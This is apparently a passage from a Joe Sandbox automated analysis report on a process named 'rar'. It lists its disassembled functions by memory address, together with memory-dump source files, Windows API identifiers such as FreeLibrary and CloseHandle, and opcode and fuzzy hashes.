                                                                                                                                                                                                                                      Function 00007FF69A44231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                                                                                      • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                      • Instruction ID: b0dd689c7a0c4429a8dacb6d2cfbddf48a7c8da215787db6e4f5761110ac7f4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40419E21A19A5386FBB89F25A85027872E1FF90F40F1454F9DA0ECB6D1DE3CE8858780
                                                                                                                                                                                                                                      Function 00007FF69A3F4D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CommandLine
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3253501508-0
                                                                                                                                                                                                                                      • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                      • Instruction ID: 4178c20214972e788a597f0e755c4fc082992270277c3235bd4a3e89e4c2a9ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59016D12A2E64285FA20AA17A5002BA76E0EF85B94F4814FDFE8DC736ADE3DD4419304
                                                                                                                                                                                                                                      Function 00007FF69A444B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                      • Instruction ID: 59f4b18bf7f4adfde4031c158644005bcd6bfc35fb9c0608669e4836163addaf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A014F50A0C68382FA749EA65A4127931D0DF88FE5F1882F0EE2DC72D6ED2CE4414391
                                                                                                                                                                                                                                      Function 00007FF69A42A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CompareString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1825529933-0
                                                                                                                                                                                                                                      • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                      • Instruction ID: 8ba77264e43ee4869b500a78c7ae2dadae0e2835c97f74510a44fdf518e0a7e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0018665B0C69245EA206F13A40406AF6D1FB99FC0F5D48B5EF9DCBB5ACE3CE0424B04
                                                                                                                                                                                                                                      Function 00007FF69A404554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                      • Instruction ID: 3372efa9105e70237324b196f8ec1f1f1c84c456c70559fa09429ad486354e6c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16F0A9619082C145DB219B7561452F83790DF16FB5F0843F5DF7C8B2C7CE6CA0849B10
                                                                                                                                                                                                                                      Function 00007FF69A444AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                      • Instruction ID: 6f8fb864644f4bd4f8e92873eb4e0fcf57ce5710a504989759b0f7864c0d02f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73F0FE15A4D34246FA746EA1584127532C1DF44FA1F5806F0ED2ED72C1EE9CE49183A4
                                                                                                                                                                                                                                      Function 00007FF69A4138A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                      • Instruction ID: 35deacd79927c0cb325dd292e8ec4fd6d28d7edeec2366cae820d26b685f638b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAE0B698F1930681EDB92B6228514BD22C0DF7AF81E5664F9CC1EC6382DD1EB4B95B11
                                                                                                                                                                                                                                      Function 00007FF69A44FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                      • Instruction ID: 72d49f04f15d83f655cb2cd98467a27f5b395baf210bfb86f6b9002a9734d286
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DD09E65F1BA0685F7A4DB49F88573032E1FF54F99F4506F5C81D85551CFAD20548340
                                                                                                                                                                                                                                      Function 00007FF69A404538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A404549
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                      • Instruction ID: cbfcf465bc94c58ab26bba1a79e491f57f79f06c66412d666aa207ba906a8cee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEC02B25E0148180C614532D98450343190FFC5F39FD013F0D33EC61E0CF1800EB0300
                                                                                                                                                                                                                                      Function 00007FF69A401930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                      • Instruction ID: f128b45a3e56f8539a349775acb467b4418a797118af313a59b300e63c081eac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43F0AF22A0864249FB348B78E44037936D0DB61FB8F9953B4D67D850D8CF68D892C750

                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                      Function 00007FF69A4067E0 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 441COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4249F4: LoadStringW.USER32 ref: 00007FF69A424A7B
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A4249F4: LoadStringW.USER32 ref: 00007FF69A424A94
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A42B6D0: Sleep.KERNEL32(?,?,?,?,00007FF69A3FCBED,?,00000000,?,00007FF69A427A8C), ref: 00007FF69A42B730
                                                                                                                                                                                                                                      • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF69A406CB0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
